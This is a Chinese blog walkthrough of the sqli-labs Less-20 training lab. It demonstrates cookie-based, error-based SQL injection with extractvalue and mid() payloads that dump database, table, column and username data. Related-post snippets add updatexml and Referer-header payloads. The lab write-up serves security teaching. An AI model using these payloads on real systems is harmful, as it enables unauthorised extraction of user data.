【网络安全】sqli-labs Less-20 解题详析

原创 已于 2025-09-14 08:44:40 修改 · 4k 阅读 · 1 ·
CC 4.0 BY-SA版权
原创文章,禁止转载,否则保留追究法律责任的权利。
文章标签:

#web安全 #数据库 #sqlilabs #报错注入

于 2023-08-02 09:21:58 首次发布
本文详细解析sqli-labs Less-20关卡的解题过程,通过报错注入技巧与mid函数应用,成功获取数据库信息,包括库名、表名、列名及数据。

文章目录

正文

由源码可知,注入类型为单引号注入,注入点为cookie

在这里插入图片描述

测试得到正确的用户名为admin,密码为1,登录:

在这里插入图片描述
抓包后修改cookie即可

该题使用报错注入,原理及姿势参考: 报错注入+Sqli-Labs Less-5实战

查库名

admin' and extractvalue(1,concat(0x23,database()))#

在这里插入图片描述

得到库名为security

查表名

admin' and extractvalue(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema = database())))#

在这里插入图片描述

查列名

admin' and extractvalue(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = 'users')))#

在这里插入图片描述

得到三个列

查数据

该姿势使用到mid函数,参考文章:【mid函数原理、应用及实战讲解】

我们以username列为例,利用mid()函数构造POC如下:

admin' and extractvalue(1,concat(0x23,mid((select group_concat(username) from users),1,32)))#

在这里插入图片描述

接着,我们提取从第 32 个字符开始的长度为 32 的子字符串:

POC如下:

admin' and extractvalue(1,concat(0x23,mid((select group_concat(username) from users),32,32)))#

在这里插入图片描述

同理即可得到所有的username

总结

以上为【网络安全】sqli-labs Less-20 解题详析,考察报错注入及mid函数的应用,后续将分享【网络安全】sqli-labs Less-21 解题详析。

sqli-labs less-19 less-20 less-22
weixin_74182283的博客
04-02 1246
由于上述所说的cookie原理,一开始是不会有cookie信息的,但登录后,就会自动出现一则cookie信息。' and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) or '1'='1 通过报错注入的函数,对其进行攻击,成功得到数据库信息。' and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) or '1'='1 通过报错注入的函数,对其进行攻击,成功得到数据库信息。
sqli-lab-less19
Sa1nZen的博客
08-05 214
sqli-lab-less19。
Sqli-labs靶场第20解[Sqli-labs-less-20]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 1304
设想如果在Cookie尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。登录后会有记录 Cookie 值。在Cookie 处加上*代表注入点。
网络安全sqli-labs Less-19 解题
等风来
08-02 3939
由代码审计可知,注入点为HTTP_REFERER,且注入类型为',注入语句)#。该题采用报错注入,原理及姿势参考:【报错注入+Sqli-Labs Less-5实战】,查库名。测试得到正确的用户名为admin,密码为1,抓包后修改referer为以下POC:1',extractvalue(1,concat(0x23,database())))#
sqli-labs (less-19)
kukudeshuo的博客
03-11 460
sqli-labs (less-19) 进入19关,输入用户名和密码,发现屏幕回显了我们的IP地址和Referer头,根据18关踩得坑,这里我们可以大胆猜想注入点就在Referer头里 使用burpsuite抓包 抓包后发现,根本就没有Referer头,怎么办呢,没事,我们可以自己添加Referer头,添加完后我们输入’试试 系统报错,验证了我们的猜想,也说明了闭合方式为’ or ‘1’='1,并且为字符型注入 查库 后面的过程与less-18完全一样,具体过程请看我的less-18 ...
精选资源
网络安全 - Web 安全靶场 - sqli-labs-php7.zip
10-13
该资源包来源于GitHub上的一个开源项目,由专业的网络安全爱好者或开发者维护和更新。通过sqli-labs-php7.zip,用户可以搭建一个模拟的SQL注入环境,从而在不危害真实系统的前提下,进行各种SQL注入攻击和防御的练习...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master.zip
01-18
Sqli-labs是一个在线的SQL注入练习平台,提供了一系列关卡供用户练习SQL注入的技巧和防范方法。在这个平台上,用户可以尝试...Sqli-labs旨在帮助网络安全专业人员提高技能和意识,以便更好地应对现实世界中的网络攻击。
sqli-labs-master 靶场环境
最新发布
08-30
sqli-labs-master 靶场环境
精选资源
Sqli-labs-maste 靶场的下载, phpStudy 下载
09-13
在信息技术安全领域,SQL注入是常见的攻击手段,攻击者通过在Web应用的输入字段中插入恶意SQL语句,试图破坏...phpStudy和Sqli-labs-maste的结合使用,为网络安全的学习和研究提供了一个安全、高效、便捷的学习平台。
sqli-labs(less-19)
m0_64849639的博客
08-06 281
sqli-labs(less-19)
sqli-labs Less 19
m0_60829468的博客
11-05 357
​​​​​​ 一、观察less19,思考 观察less19发现,19关的设定和18关十分相识,细节部分可以看我的18关闯关细讲解,这里直接开始通关流程。 二、查数据库名 Referer: http://localhost/sqlilabs/Less-19/'and extractvalue(1,concat(0x7e,database(),0x7e)) and ' 三、查询表名 Referer: http://localhost/sqlilabs/Less-19/'and..
sqli-labs19
devilare的博客
01-19 382
sqli-labs19基于referer的SQL注入 来到19题 应该是要在Referer处入手了,抓包单引号闭合一下 出现报错,说明能够进行注入,但是怎么注入呢?看一下源码只插入两个参数,根据18题的基础构造语句查库名’,updatexml(1,concat(0x7e,database(),0x7e),1))# 接下来就是常规操作了 Git it! ...
sqli-labs(19)
jimggg的博客
03-20 351
Less-19 POST - Header Injection - Referer field - Error based (基于头部的Referer POST报错注入)
sqli-labs(19)
weixin_30615767的博客
05-27 160
百度了一下 基于错误的referer头的注入 0X01爱之初体验 猜测是基于referer头的注入 我们在referer后面加入单引号测试一下 真的报错了诶 那我们猜测一下 他应该是把 referer插入到数据库中去了 语句怎么构造呐? 说实话 这里我不知道 得看看源码才能知道 因为还不熟悉结构 原来是将referer和ip插入到数据库中去 只有两个要插入 那我们尝试一下构造...
SQLi Labs Lesson19
1ame的博客
08-16 398
Lesson - 19 POST - Header Injection - Referer field - Error based 首先进入欢迎界面: 查看后台php源代码: $uname = check_input($_POST['uname']); $passwd = check_input($_POST['passwd']); 对username , passw
SQLi LABS Less-19 报错注入
热门推荐
wangyuxiang946的博客
08-14 1万+
sqlilibs19,SQLI-LABS第十九关,sqli-labs十九关 但后面插入HTTP Referer时,并没有对参数进行过滤,我们可以从Referer入手 首先,输入正确的账号和密码,只有账号和密码都正确,才能操作Referer 然后使用代理软件(Burp Suite)拦截POST请求,修改Referer的参数,页面出现了报错信息,接下来即可使用报错注入进行脱库 1' and updatexml(1,0x7e,1) and ' 获...
sqli-labs-Less-20 cookie头注入(全套题目,持续更新)
yzcn
11-21 597
Less-20 cookie头注入 **Cookie:**有时也用其复数形式 Cookies。类型为“小型文本文件”,是某些网站为了辨别用户身份,进行Session跟踪而储存在用户本地终端上的数据(通常经过加密),由用户客户端计算机暂时或永久保存的信息。 先正常登陆: 返回了输入的name和password,并提示使用cookie注入 判断注入点,使用插件Cookie Editor修改cookie,因为第一次登陆成功,cookie的值会在数据库存放,所以我们第一次登陆成功,后面更改cookie的值进行注入
sql注入sqli-labs(less11-less20)
小宇的web博客
03-17 921
sql注入sqli-labs(less11-less20)特less11 1.输入用户名和密码admin和admin查看输出 2.利用burpsuite来进行抓包(这个抓包软件需要java环境自行配置和下载直接度娘,burp下载后还需要自行把火狐浏览器的代理服务器配置)。 3.打开burpsuite来进行抓包(uname=admin&passwd=admin&submit=Submit这个就是抓包的数据) 4.将这个数据复制后打开火狐浏览器,复制到指定的位置。(这时必须关闭bu
[网络安全]sqli-labs Less-1 解题
12-25
SQLi-Labs网络安全领域的一个练习平台,Less-1 是其中一道关于SQL注入攻击的经典题目。在这道题中,你需要利用SQL注入技巧来获取数据库中的敏感信息,通常会涉及HTML表单、GET或POST请求以及对数据库查询构造的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值